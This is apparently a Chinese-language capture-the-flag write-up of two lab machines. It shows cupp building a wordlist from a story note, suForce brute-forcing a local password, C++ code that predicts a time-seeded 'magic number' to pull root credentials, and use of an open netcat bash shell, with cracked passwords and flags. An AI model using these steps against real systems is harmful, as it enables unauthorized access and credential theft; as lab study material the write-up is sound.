lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ ls
note2.txt
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ cat note2.txt
The Compass and the Campfire
David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."
Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."
A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."
The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.
"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."
They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."
Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"
The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.
Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.
得到一个提示,根据上一个提示的cupp,应该是要使用cupp这个工具来生成一个字典
┌──(root㉿kali)-[~]
└─# cupp -i
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
print(" \ # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m,__,\033[1;m # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
print(" \033[1;31m(__) )\ \033[1;m ")
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: David
> Surname: knelt
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name: Jake
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 298 words.
[+] Now load your pistolero with david.txt and shoot! Good luck!
┌──(root㉿kali)-[~]
└─# cat david.txt
David2008
David2009
David2010
David2011
David2012
David2013
David2014
David2015
David2016
David2017
David2018
David2019
David2020
DavidKnelt
DavidKnelt_
David_
David_2008
David_2009
David_2010
David_2011
David_2012
David_2013
David_2014
David_2015
David_2016
David_2017
David_2018
David_2019
David_2020
Davidknelt
Davidknelt_
Jake2008
Jake2009
Jake2010
Jake2011
Jake2012
Jake2013
Jake2014
Jake2015
Jake2016
Jake2017
Jake2018
Jake2019
Jake2020
JakeKnelt
JakeKnelt_
Jake_2008
Jake_2009
Jake_2010
Jake_2011
Jake_2012
Jake_2013
Jake_2014
Jake_2015
Jake_2016
Jake_2017
Jake_2018
Jake_2019
Jake_2020
Jakeknelt
Jakeknelt_
Knelt2008
Knelt2009
Knelt2010
Knelt2011
Knelt2012
Knelt2013
Knelt2014
Knelt2015
Knelt2016
Knelt2017
Knelt2018
Knelt2019
Knelt2020
KneltDavid
KneltDavid_
KneltJake
KneltJake_
Knelt_
Knelt_2008
Knelt_2009
Knelt_2010
Knelt_2011
Knelt_2012
Knelt_2013
Knelt_2014
Knelt_2015
Knelt_2016
Knelt_2017
Knelt_2018
Knelt_2019
Knelt_2020
Kneltdavid
Kneltdavid_
Kneltjake
Kneltjake_
david2008
david2009
david2010
david2011
david2012
david2013
david2014
david2015
david2016
david2017
david2018
david2019
david2020
davidKnelt
davidKnelt_
david_
david_2008
david_2009
david_2010
david_2011
david_2012
david_2013
david_2014
david_2015
david_2016
david_2017
david_2018
david_2019
david_2020
davidknelt
davidknelt_
divaD2008
divaD2009
divaD2010
divaD2011
divaD2012
divaD2013
divaD2014
divaD2015
divaD2016
divaD2017
divaD2018
divaD2019
divaD2020
divaD_
divaD_2008
divaD_2009
divaD_2010
divaD_2011
divaD_2012
divaD_2013
divaD_2014
divaD_2015
divaD_2016
divaD_2017
divaD_2018
divaD_2019
divaD_2020
divad2008
divad2009
divad2010
divad2011
divad2012
divad2013
divad2014
divad2015
divad2016
divad2017
divad2018
divad2019
divad2020
divad_
divad_2008
divad_2009
divad_2010
divad_2011
divad_2012
divad_2013
divad_2014
divad_2015
divad_2016
divad_2017
divad_2018
divad_2019
divad_2020
ekaJ2008
ekaJ2009
ekaJ2010
ekaJ2011
ekaJ2012
ekaJ2013
ekaJ2014
ekaJ2015
ekaJ2016
ekaJ2017
ekaJ2018
ekaJ2019
ekaJ2020
ekaJ_2008
ekaJ_2009
ekaJ_2010
ekaJ_2011
ekaJ_2012
ekaJ_2013
ekaJ_2014
ekaJ_2015
ekaJ_2016
ekaJ_2017
ekaJ_2018
ekaJ_2019
ekaJ_2020
ekaj2008
ekaj2009
ekaj2010
ekaj2011
ekaj2012
ekaj2013
ekaj2014
ekaj2015
ekaj2016
ekaj2017
ekaj2018
ekaj2019
ekaj2020
ekaj_2008
ekaj_2009
ekaj_2010
ekaj_2011
ekaj_2012
ekaj_2013
ekaj_2014
ekaj_2015
ekaj_2016
ekaj_2017
ekaj_2018
ekaj_2019
ekaj_2020
jake2008
jake2009
jake2010
jake2011
jake2012
jake2013
jake2014
jake2015
jake2016
jake2017
jake2018
jake2019
jake2020
jakeKnelt
jakeKnelt_
jake_2008
jake_2009
jake_2010
jake_2011
jake_2012
jake_2013
jake_2014
jake_2015
jake_2016
jake_2017
jake_2018
jake_2019
jake_2020
jakeknelt
jakeknelt_
knelt2008
knelt2009
knelt2010
knelt2011
knelt2012
knelt2013
knelt2014
knelt2015
knelt2016
knelt2017
knelt2018
knelt2019
knelt2020
kneltDavid
kneltDavid_
kneltJake
kneltJake_
knelt_
knelt_2008
knelt_2009
knelt_2010
knelt_2011
knelt_2012
knelt_2013
knelt_2014
knelt_2015
knelt_2016
knelt_2017
knelt_2018
knelt_2019
knelt_2020
kneltdavid
kneltdavid_
kneltjake
kneltjake_
下面需要使用Suforce这个工具和david.txt这个字典
lamb@pwnding:/tmp$ bash suForce -u lamb -w david.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
Username | lamb
Wordlist | david.txt
Status | 203/297/68%/ekaJ_2016
Password | ekaJ_2016
───────────────────────────────────
得到密码ekaJ_2016,这个就是lamb用户的密码
lamb@pwnding:/tmp$ sudo -l
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lamb may run the following commands on pwnding:
(ALL : ALL) PASSWD: /usr/local/bin/getroot
lamb@pwnding:/tmp$ sudo /usr/local/bin/getroot
Usage: /usr/local/bin/getroot <magic_number>
下面就是转为分析getroot的二进制文件了,还是找到main函数,让deepseek去分析
int __fastcall main(int argc, const char **argv, const char **envp)
{
double v3; // xmm0_8
__int64 v4; // rax
__int64 v5; // rax
__int64 v6; // rdx
__int64 v7; // rax
int v8; // ebx
unsigned int v9; // eax
__int64 v10; // rax
__int64 v11; // rax
char v13[256]; // [rsp+10h] [rbp-260h] BYREF
__int64 v14; // [rsp+110h] [rbp-160h] BYREF
char v15[32]; // [rsp+220h] [rbp-50h] BYREF
int v16; // [rsp+240h] [rbp-30h] BYREF
int v17; // [rsp+244h] [rbp-2Ch] BYREF
int v18; // [rsp+248h] [rbp-28h] BYREF
char v19; // [rsp+24Fh] [rbp-21h] BYREF
double v20; // [rsp+250h] [rbp-20h]
int v21; // [rsp+258h] [rbp-18h]
int v22; // [rsp+25Ch] [rbp-14h]
if ( argc > 1 )
{
v22 = atoi(argv[1]);
v9 = time(0LL);
srand(v9);
v21 = rand() % 86400;
generate_normal_distribution();
v20 = v3;
v16 = (5.0 * v3) + v21;
v17 = 86399;
v10 = std::min<int>(&v16, &v17);
v18 = 0;
v16 = *std::max<int>(&v18, v10);
std::allocator<char>::allocator(&v19);
std::string::basic_string(v15, "/root/cred", &v19);
std::allocator<char>::~allocator(&v19);
if ( v22 == v16 + 12345 )
{
std::ifstream::basic_ifstream(v13, v15, 8LL);
if ( std::ios::operator bool(&v14) )
{
v11 = std::ifstream::rdbuf(v13);
std::ostream::operator<<(&std::cout, v11);
}
std::ifstream::~ifstream(v13);
}
v8 = 0;
std::string::~string(v15);
}
else
{
v4 = std::operator<<<std::char_traits<char>>(&std::cerr, "Usage: ", envp);
v5 = std::operator<<<std::char_traits<char>>(v4, *argv, v4);
v7 = std::operator<<<std::char_traits<char>>(v5, " <magic_number>", v6);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
return 1;
}
return v8;
}
这段代码是一个需要特定魔法数字(magic_number)才能访问 /root/cred 文件的程序。它结合了伪随机数生成和正态分布计算来动态生成一个校验值,只有输入正确的参数才能解密并显示文件内容。
代码逻辑分析
1. 参数检查
c
复制
if ( argc > 1 )
检查是否提供了命令行参数(argc > 1)。
如果没有参数,打印使用说明并退出:
c
复制
std::cerr << "Usage: " << argv[0] << " <magic_number>" << std::endl;
return 1;
2. 初始化随机数
c
复制
v22 = atoi(argv[1]); // 用户输入的参数
v9 = time(0LL); // 获取当前时间戳
srand(v9); // 用时间戳初始化随机数种子
v21 = rand() % 86400; // 生成 0~86399 的随机数(1天内的秒数)
v22 是用户输入的参数(argv[1])。
v21 是一个基于当前时间的随机数(范围:0~86399)。
3. 正态分布计算
c
复制
generate_normal_distribution(); // 生成正态分布值
v20 = v3; // 存储正态分布结果
v16 = (5.0 * v3) + v21; // 计算偏移值
generate_normal_distribution() 生成一个符合**标准正态分布(μ=0, σ=1)**的随机数 v3。
v16 = 5.0 * v3 + v21:
5.0 * v3 引入随机波动(±5σ)。
+ v21 确保最终值在 v21 附近。
4. 范围约束
c
复制
v17 = 86399;
v10 = std::min<int>(&v16, &v17); // 确保 v16 ≤ 86399
v18 = 0;
v16 = *std::max<int>(&v18, v10); // 确保 v16 ≥ 0
v16 被限制在 0~86399 之间(防止越界)。
5. 校验魔法数字
c
复制
if ( v22 == v16 + 12345 )
用户输入的 v22 必须等于 v16 + 12345 才能通过校验。
12345 是一个固定偏移量,用于增加破解难度。
6. 读取 /root/cred 文件
c
复制
std::ifstream::basic_ifstream(v13, "/root/cred", 8LL);
if ( std::ios::operator bool(&v14) ) // 检查文件是否成功打开
{
v11 = std::ifstream::rdbuf(v13);
std::ostream::operator<<(&std::cout, v11); // 输出文件内容
}
如果校验通过,程序会读取 /root/cred 并输出其内容。
否则,直接退出。
关键点总结
动态校验机制:
基于当前时间(time(0))生成随机数 v21。
引入正态分布(generate_normal_distribution())增加随机性。
最终校验值 v16 + 12345 是动态计算的,每次运行都可能不同。
文件访问控制:
只有提供正确的 magic_number 才能读取 /root/cred。
该文件可能是敏感凭证(如密码、密钥等)。
安全设计:
使用 srand(time(0)) 确保每次运行的校验值不同。
正态分布 增加了逆向工程的难度。
这是deepseek的解释,直接让deepseek帮我们写一个生成一个输出只有数字的代码,并给我们编译方案
#include <iostream>
#include <cmath>
#include <ctime>
#include <cstdlib>
#include <algorithm>
using namespace std;
double generate_normal_distribution() {
// 使用两次rand(),避免与后续rand()调用顺序冲突
double x = rand() / 2147483647.0; // 注意:2147483647 = 0x7FFFFFFF
double v3 = rand() / 2147483647.0;
double v0 = log(x); // 原IDA伪代码中的log计算
double v2 = sqrt(-2.0 * v0); // 平方根部分
// 6.283185307179586对应2*M_PI的精度
return cos(6.283185307179586 * v3) * v2;
}
int main() {
srand(time(0)); // 同步时间种子
// 生成第一个随机数(对应原程序v21)
int v21 = rand() % 86400;
// 生成正态分布值(使用后续两个rand()调用)
double normal_value = generate_normal_distribution();
// 计算最终值
int temp = static_cast<int>(5.0 * normal_value) + v21;
temp = max(0, min(temp, 86399)); // 强制限制范围
int key = temp + 12345; // 最终密钥
cout << key << endl;
return 0;
}
deepseek生成的代码有问题使用了大佬的方案给出了root的密码
lamb@pwnding:~$ vi a.c
lamb@pwnding:~$ g++ -o key a.c -B /usr/bin/
lamb@pwnding:~$ ./key
59121
lamb@pwnding:~$ ./key
67002
lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./key)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0
这个$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0,然后直接切换到root
lamb@pwnding:~$ su - root
Password:
root@pwnding:~# id
uid=0(root) gid=0(root) groups=0(root)
root@pwnding:~# ls
cred monitor.sh ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
root@pwnding:~# cat ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
flag{46511d58f2ae11ef9ea3000c29094b2d}
Todd
信息搜集
nmap扫描到了好多端口
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 17:00 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.111
Host is up (0.0078s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3304/tcp open opsession-srvr
5554/tcp open sgi-esphttp
7066/tcp open unknown
8178/tcp open unknown
10759/tcp open unknown
10854/tcp open unknown
18869/tcp open unknown
20113/tcp open unknown
23119/tcp open unknown
26713/tcp open unknown
28950/tcp open unknown
MAC Address: 08:00:27:5B:C1:7B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.19 seconds
当我们再次输入nmap这串指令时,会发现2次扫描的端口号是不一样的,但是有一个7066是不变的
再使用gobuster对目录进行扫描
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.111/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tools (Status: 301) [Size: 316] [--> http://192.168.56.111/tools/]
扫出来一个tools目录,进去看了一下有一些常用的工具,比如fscan,pspy64,linpeas.sh等,但是没什么发现
user flag
先nc连接上去看看吧
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
pwd
/root
cd ..
pwd
/
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
todd
cd todd
ls
user.txt
cat user.txt
Todd{eb93009a2719640de486c4f68daf62ec}
再根据我们之前在tools目录找到的工具,去/var/www/html/tools目录运行一下工具
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
pwd
/root
cd ..
pwd
/
cd var/www/html
ls
index.html
tools
cd tools
ls
fscan
les.sh
linpeas.sh
pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/03/23 04:06:59 CMD: UID=0 PID=31227 | /sbin/init
2025/03/23 04:06:59 CMD: UID=1000 PID=31217 | ./pspy64
2025/03/23 04:06:59 CMD: UID=1000 PID=31173 | nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31172 | sudo -u todd nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31171 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31170 | nc -e /opt/fake_ssh -lp 21247
2025/03/23 04:06:59 CMD: UID=0 PID=31169 | sudo -u todd nc -e /opt/fake_ssh -lp 21247
2025/03/23 04:06:59 CMD: UID=0 PID=31167 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31166 | nc -e /opt/fake_ssh -lp 2085
2025/03/23 04:06:59 CMD: UID=0 PID=31165 | sudo -u todd nc -e /opt/fake_ssh -lp 2085
2025/03/23 04:06:59 CMD: UID=0 PID=31163 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31162 | nc -e /opt/fake_ssh -lp 24265
2025/03/23 04:06:59 CMD: UID=0 PID=31161 | sudo -u todd nc -e /opt/fake_ssh -lp 24265
2025/03/23 04:06:59 CMD: UID=0 PID=31159 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31157 | nc -e /opt/fake_ssh -lp 2339
2025/03/23 04:06:59 CMD: UID=0 PID=31156 | sudo -u todd nc -e /opt/fake_ssh -lp 2339
2025/03/23 04:06:59 CMD: UID=0 PID=31154 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31153 | nc -e /opt/fake_ssh -lp 10146
2025/03/23 04:06:59 CMD: UID=0 PID=31152 | sudo -u todd nc -e /opt/fake_ssh -lp 10146
2025/03/23 04:06:59 CMD: UID=0 PID=31150 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31149 | nc -e /opt/fake_ssh -lp 30430
2025/03/23 04:06:59 CMD: UID=0 PID=31148 | sudo -u todd nc -e /opt/fake_ssh -lp 30430
2025/03/23 04:06:59 CMD: UID=0 PID=31146 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31145 | nc -e /opt/fake_ssh -lp 24204
2025/03/23 04:06:59 CMD: UID=0 PID=31144 | sudo -u todd nc -e /opt/fake_ssh -lp 24204
2025/03/23 04:06:59 CMD: UID=0 PID=31142 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31141 | nc -e /opt/fake_ssh -lp 23849
2025/03/23 04:06:59 CMD: UID=0 PID=31140 | sudo -u todd nc -e /opt/fake_ssh -lp 23849
2025/03/23 04:06:59 CMD: UID=0 PID=31138 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31137 | nc -e /opt/fake_ssh -lp 7616
2025/03/23 04:06:59 CMD: UID=1000 PID=31136 | bash
2025/03/23 04:06:59 CMD: UID=0 PID=31135 | sudo -u todd nc -e /opt/fake_ssh -lp 7616
2025/03/23 04:06:59 CMD: UID=0 PID=31133 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=0 PID=31131 | sudo -u todd nc -e /bin/bash -lp 7066
2025/03/23 04:06:59 CMD: UID=0 PID=31130 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:06:59 CMD: UID=0 PID=30903 |
2025/03/23 04:06:59 CMD: UID=0 PID=30732 |
2025/03/23 04:06:59 CMD: UID=0 PID=30618 |
2025/03/23 04:06:59 CMD: UID=0 PID=29970 |
2025/03/23 04:06:59 CMD: UID=0 PID=4751 |
2025/03/23 04:06:59 CMD: UID=0 PID=4583 |
2025/03/23 04:06:59 CMD: UID=33 PID=489 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=33 PID=488 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=0 PID=394 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=0 PID=364 | /usr/sbin/sshd -D
2025/03/23 04:06:59 CMD: UID=0 PID=348 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2025/03/23 04:06:59 CMD: UID=0 PID=338 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/03/23 04:06:59 CMD: UID=104 PID=312 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/03/23 04:06:59 CMD: UID=0 PID=311 | /usr/sbin/rsyslogd -n -iNONE
2025/03/23 04:06:59 CMD: UID=0 PID=310 | /lib/systemd/systemd-logind
2025/03/23 04:06:59 CMD: UID=0 PID=309 | /usr/sbin/cron -f
2025/03/23 04:06:59 CMD: UID=0 PID=301 |
2025/03/23 04:06:59 CMD: UID=0 PID=298 |
2025/03/23 04:06:59 CMD: UID=101 PID=258 | /lib/systemd/systemd-timesyncd
2025/03/23 04:06:59 CMD: UID=0 PID=239 | /lib/systemd/systemd-udevd
2025/03/23 04:06:59 CMD: UID=0 PID=217 | /lib/systemd/systemd-journald
2025/03/23 04:06:59 CMD: UID=0 PID=187 |
2025/03/23 04:06:59 CMD: UID=0 PID=186 |
2025/03/23 04:06:59 CMD: UID=0 PID=184 |
2025/03/23 04:06:59 CMD: UID=0 PID=153 |
2025/03/23 04:06:59 CMD: UID=0 PID=114 |
2025/03/23 04:06:59 CMD: UID=0 PID=112 |
2025/03/23 04:06:59 CMD: UID=0 PID=111 |
2025/03/23 04:06:59 CMD: UID=0 PID=109 |
2025/03/23 04:06:59 CMD: UID=0 PID=107 |
2025/03/23 04:06:59 CMD: UID=0 PID=106 |
2025/03/23 04:06:59 CMD: UID=0 PID=104 |
2025/03/23 04:06:59 CMD: UID=0 PID=59 |
2025/03/23 04:06:59 CMD: UID=0 PID=49 |
2025/03/23 04:06:59 CMD: UID=0 PID=48 |
2025/03/23 04:06:59 CMD: UID=0 PID=30 |
2025/03/23 04:06:59 CMD: UID=0 PID=29 |
2025/03/23 04:06:59 CMD: UID=0 PID=28 |
2025/03/23 04:06:59 CMD: UID=0 PID=27 |
2025/03/23 04:06:59 CMD: UID=0 PID=26 |
2025/03/23 04:06:59 CMD: UID=0 PID=25 |
2025/03/23 04:06:59 CMD: UID=0 PID=24 |
2025/03/23 04:06:59 CMD: UID=0 PID=23 |
2025/03/23 04:06:59 CMD: UID=0 PID=22 |
2025/03/23 04:06:59 CMD: UID=0 PID=21 |
2025/03/23 04:06:59 CMD: UID=0 PID=20 |
2025/03/23 04:06:59 CMD: UID=0 PID=19 |
2025/03/23 04:06:59 CMD: UID=0 PID=18 |
2025/03/23 04:06:59 CMD: UID=0 PID=17 |
2025/03/23 04:06:59 CMD: UID=0 PID=16 |
2025/03/23 04:06:59 CMD: UID=0 PID=15 |
2025/03/23 04:06:59 CMD: UID=0 PID=14 |
2025/03/23 04:06:59 CMD: UID=0 PID=12 |
2025/03/23 04:06:59 CMD: UID=0 PID=11 |
2025/03/23 04:06:59 CMD: UID=0 PID=10 |
2025/03/23 04:06:59 CMD: UID=0 PID=9 |
2025/03/23 04:06:59 CMD: UID=0 PID=8 |
2025/03/23 04:06:59 CMD: UID=0 PID=6 |
2025/03/23 04:06:59 CMD: UID=0 PID=4 |
2025/03/23 04:06:59 CMD: UID=0 PID=3 |
2025/03/23 04:06:59 CMD: UID=0 PID=2 |
2025/03/23 04:06:59 CMD: UID=0 PID=1 | /sbin/init
2025/03/23 04:07:00 CMD: UID=0 PID=31229 | (bash)
2025/03/23 04:07:01 CMD: UID=0 PID=31230 | /sbin/init
2025/03/23 04:07:03 CMD: UID=0 PID=31231 | (bash)
2025/03/23 04:07:04 CMD: UID=0 PID=31232 | /sbin/init
2025/03/23 04:07:05 CMD: UID=0 PID=31233 | /sbin/init
2025/03/23 04:07:06 CMD: UID=0 PID=31234 | /sbin/init
2025/03/23 04:07:08 CMD: UID=0 PID=31235 | /sbin/init
2025/03/23 04:07:09 CMD: UID=0 PID=31236 | (bash)
2025/03/23 04:07:10 CMD: UID=0 PID=31237 | (bash)
2025/03/23 04:07:11 CMD: UID=0 PID=31238 | /sbin/init
2025/03/23 04:07:13 CMD: UID=0 PID=31239 | /sbin/init
2025/03/23 04:07:15 CMD: UID=0 PID=31241 | /sbin/init
2025/03/23 04:07:16 CMD: UID=0 PID=31242 | /sbin/init
2025/03/23 04:07:18 CMD: UID=0 PID=31243 | /sbin/init
2025/03/23 04:07:19 CMD: UID=0 PID=31244 | /sbin/init
2025/03/23 04:07:20 CMD: UID=0 PID=31245 | (bash)
2025/03/23 04:07:21 CMD: UID=0 PID=31246 | /sbin/init
2025/03/23 04:07:23 CMD: UID=0 PID=31247 | /sbin/init
2025/03/23 04:07:24 CMD: UID=0 PID=31248 | /sbin/init
2025/03/23 04:07:25 CMD: UID=0 PID=31249 | /sbin/init
2025/03/23 04:07:26 CMD: UID=0 PID=31250 | (bash)
2025/03/23 04:07:28 CMD: UID=0 PID=31251 | /sbin/init
2025/03/23 04:07:29 CMD: UID=0 PID=31252 | /sbin/init
2025/03/23 04:07:30 CMD: UID=0 PID=31253 | /sbin/init
2025/03/23 04:07:31 CMD: UID=0 PID=31254 | /sbin/init
2025/03/23 04:07:33 CMD: UID=0 PID=31255 | /sbin/init
2025/03/23 04:07:34 CMD: UID=0 PID=31256 | /sbin/init
2025/03/23 04:07:35 CMD: UID=0 PID=31257 | /sbin/init
2025/03/23 04:07:36 CMD: UID=0 PID=31258 | /sbin/init
2025/03/23 04:07:38 CMD: UID=0 PID=31259 | (bash)
2025/03/23 04:07:39 CMD: UID=0 PID=31260 | /sbin/init
2025/03/23 04:07:40 CMD: UID=0 PID=31261 | /sbin/init
2025/03/23 04:07:40 CMD: UID=0 PID=31262 |
2025/03/23 04:07:41 CMD: UID=0 PID=31263 | /sbin/init
2025/03/23 04:07:43 CMD: UID=0 PID=31264 | /sbin/init
2025/03/23 04:07:44 CMD: UID=0 PID=31265 | /sbin/init
2025/03/23 04:07:45 CMD: UID=0 PID=31266 | /sbin/init
2025/03/23 04:07:46 CMD: UID=0 PID=31267 | /sbin/init
2025/03/23 04:07:48 CMD: UID=0 PID=31268 | /sbin/init
2025/03/23 04:07:49 CMD: UID=0 PID=31269 | /sbin/init
2025/03/23 04:07:50 CMD: UID=0 PID=31270 | /sbin/init
2025/03/23 04:07:51 CMD: UID=0 PID=31271 | /sbin/init
2025/03/23 04:07:53 CMD: UID=0 PID=31272 | (bash)
2025/03/23 04:07:54 CMD: UID=0 PID=31273 | /sbin/init
2025/03/23 04:07:55 CMD: UID=0 PID=31274 | /sbin/init
2025/03/23 04:07:56 CMD: UID=0 PID=31275 | /sbin/init
2025/03/23 04:07:58 CMD: UID=0 PID=31276 | /sbin/init
2025/03/23 04:07:59 CMD: UID=0 PID=31277 | /sbin/init
2025/03/23 04:08:00 CMD: UID=0 PID=31278 | /sbin/init
2025/03/23 04:08:01 CMD: UID=0 PID=31279 | /sbin/init
2025/03/23 04:08:01 CMD: UID=0 PID=31282 | /usr/sbin/CRON -f
2025/03/23 04:08:01 CMD: UID=0 PID=31281 | /usr/sbin/cron -f
2025/03/23 04:08:01 CMD: UID=0 PID=31280 | /usr/sbin/cron -f
2025/03/23 04:08:01 CMD: UID=0 PID=31284 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31283 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31287 | /bin/sh -c /bin/bash /opt/kill_todd.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31286 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31285 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31290 | /bin/bash /opt/kill_todd.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31289 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31288 | /bin/bash /opt/create_nc.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31291 | /bin/bash /opt/create_nc.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31292 | /bin/bash /opt/create_nc2.sh
